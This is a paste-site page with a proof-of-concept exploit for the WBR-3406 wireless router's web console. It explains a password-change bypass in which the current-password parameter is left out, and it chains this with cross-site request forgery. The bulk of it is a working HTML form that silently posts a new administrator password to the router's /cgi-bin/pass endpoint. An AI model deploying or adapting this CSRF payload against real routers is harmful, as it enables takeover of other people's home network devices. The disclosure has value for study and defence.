WBR-3406 Wireless Broadband NAT Router Web-Console - Password Change Bypass & CSRF Vulnerability

SUBMITTED BY: Guest

DATE: Nov. 24, 2013, 11:39 p.m.

FORMAT: Text only

SIZE: 1.6 kB

Raw Download

HITS: 2228

Report
  1. # -----------------------------------------------------------
  2. # WBR-3406 Wireless Broadband NAT Router Web-Console Password Change Bypass & CSRF Vulnerability
  3. # This PoC code should do two main things:
  4. # 1. Cross Site Request Forgery (For more information, just google it).
  5. # 2. This code change to new password without know the current password.
  6. # The vulnerability work in a way that if we remove the "PA=" parameter which is the current password
  7. # the application ignore that and change the password without even entering the old / current password.
  8. # Bug discovered by Pr0T3cT10n AKA Yakir Wizman, <yakir.wizman@gmail.com>
  9. # Date 17/08/2012
  10. # Vendor site - http://www.level1.com/
  11. # ISRAEL
  12. # -----------------------------------------------------------
  13. # Author will be not responsible for any damage.
  14. # -----------------------------------------------------------
  15. # PoC EXPLOIT
  16. # -----------------------------------------------------------
  17. <html>
  18. <body>
  19. <form action="http://192.168.123.254/cgi-bin/pass" method="POST">
  20. <input type="hidden" name="rc" value="@" />
  21. <input type="hidden" name="Pa" value="1234567" />
  22. <input type="hidden" name="P1" value="1234567" />
  23. <input type="hidden" name="rd" value="atbox" />
  24. <input type="submit" value="Submit form" />
  25. </form>
  26. </body>
  27. </html>
  29. # -----------------------------------------------------------
comments powered by Disqus